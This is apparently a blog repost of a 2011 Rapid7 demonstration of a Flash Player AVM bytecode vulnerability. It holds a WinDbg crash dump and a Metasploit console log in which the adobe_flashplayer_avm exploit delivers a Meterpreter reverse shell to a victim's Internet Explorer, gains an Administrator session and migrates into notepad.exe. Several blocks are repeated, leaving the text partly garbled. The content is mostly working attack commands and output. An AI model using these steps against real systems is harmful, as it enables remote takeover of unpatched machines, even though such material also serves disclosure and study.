(fb4.9a0): Access violation - code c0000005 (!!! second chance !!!)
eax=02b38c89 ebx=02b46b20 ecx=02b78040 edx=40027f2b esi=02b467c0 edi=02b5d1f0
eip=02b7558e esp=0013e0e8 ebp=0013e180 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00040202
02b7558e 8b4a70 mov ecx,dword ptr [edx+70h]
ds:0023:40027f9b=????????
0:000> dd eax+8
02b38c91 40027f2b 21029780 0002b36d e8180000
02b38ca1 01026d56 34800041 000263d9 08000000
02b38cb1 0a000000 e8000000 01026d56 43800042
02b38cc1 000263d9 05000000 0a000000 e8000000
02b38cd1 01026d56 58800043 000263d9 0c000000
02b38ce1 0a000000 e8000000 01026d56 7a800044
02b38cf1 000263d9 06000000 0a000000 e8000000
02b38d01 01026d56 9c800045 000263d9 08000000
0:000> u eip
02b7558e 8b4a70 mov ecx,dword ptr [edx+70h]
02b75591 8d559c lea edx,[ebp-64h]
02b75594 89459c mov dword ptr [ebp-64h],eax
02b75597 8b01 mov eax,dword ptr [ecx]
02b75599 52 push edx
02b7559a 6a00 push 0
02b7559c 51 push ecx
02b7559d ffd0 call eax
eax=02b38c89 ebx=02b46b20 ecx=02b78040 edx=40027f2b esi=02b467c0 edi=02b5d1f0
eip=02b7558e esp=0013e0e8 ebp=0013e180 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00040202
02b7558e 8b4a70 mov ecx,dword ptr [edx+70h]
ds:0023:40027f9b=????????
0:000> dd eax+8
02b38c91 40027f2b 21029780 0002b36d e8180000
02b38ca1 01026d56 34800041 000263d9 08000000
02b38cb1 0a000000 e8000000 01026d56 43800042
02b38cc1 000263d9 05000000 0a000000 e8000000
02b38cd1 01026d56 58800043 000263d9 0c000000
02b38ce1 0a000000 e8000000 01026d56 7a800044
02b38cf1 000263d9 06000000 0a000000 e8000000
02b38d01 01026d56 9c800045 000263d9 08000000
02b7558e 8b4a70 mov ecx,dword ptr [edx+70h]
02b75591 8d559c lea edx,[ebp-64h]
02b75594 89459c mov dword ptr [ebp-64h],eax
02b75597 8b01 mov eax,dword ptr [ecx]
02b75599 52 push edx
02b7559a 6a00 push 0
02b7559c 51 push ecx
02b7559d ffd0 call eax
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 672 exploits - 345 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12149 updated today (2011.03.26)
msf > use exploit/windows/browser/adobe_flashplayer_avm
msf exploit(adobe_flashplayer_avm) > set URIPATH /
URIPATH => /
msf exploit(adobe_flashplayer_avm) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.108:4444
msf exploit(adobe_flashplayer_avm) >
[*] Server started.
[*] Sending Adobe Flash Player AVM Bytecode Verification Vulnerability HTML to 192.168.0.102:3646
[*] Sending Exploit SWF
[*] Sending stage (749056 bytes) to 192.168.0.102
[*] Meterpreter session 1 opened (192.168.0.108:4444 -> 192.168.0.102:3648) at 2011-03-26 15:23:18 -0400
[*] Session ID 1 (192.168.0.108:4444 -> 192.168.0.102:3648) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2376)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 4092
[*] New server process: notepad.exe (4092)
msf exploit(adobe_flashplayer_avm) > sessions
Active sessions
===============
msf exploit(adobe_flashplayer_avm) >
+ -- --=[ 672 exploits - 345 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12149 updated today (2011.03.26)
msf > use exploit/windows/browser/adobe_flashplayer_avm
msf exploit(adobe_flashplayer_avm) > set URIPATH /
URIPATH => /
msf exploit(adobe_flashplayer_avm) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.108:4444
[*] Using URL: http://0.0.0.0:8080/
msf exploit(adobe_flashplayer_avm) >
[*] Local IP: http://192.168.0.108:8080/
[*] Server started.
[*] Sending Adobe Flash Player AVM Bytecode Verification Vulnerability HTML to 192.168.0.102:3646
[*] Sending Exploit SWF
[*] Sending stage (749056 bytes) to 192.168.0.102
[*] Meterpreter session 1 opened (192.168.0.108:4444 -> 192.168.0.102:3648) at 2011-03-26 15:23:18 -0400
[*] Session ID 1 (192.168.0.108:4444 -> 192.168.0.102:3648) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2376)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 4092
[*] New server process: notepad.exe (4092)
msf exploit(adobe_flashplayer_avm) > sessions
===============
Id Type Information Connection
-- ------- ---------------- ----------------
1 meterpreter x86/win32 WXPPROSP2-001\Administrator @ WXPPROSP2-001 192.168.0.108:4444 -> 192.168.0.102:3648
-- ------- ---------------- ----------------
1 meterpreter x86/win32 WXPPROSP2-001\Administrator @ WXPPROSP2-001 192.168.0.108:4444 -> 192.168.0.102:3648
rapid7@sgaur.hosted.jivesoftware.com 26 Mar, 2011
0 komentar:
Posting Komentar
Ayo gan Komentarnya jangan lupa,,,biar tambah semangat yang upload Film dan Game dan berita juga update artikelnya, kalau ada link yang mati laporkan juga disini ya...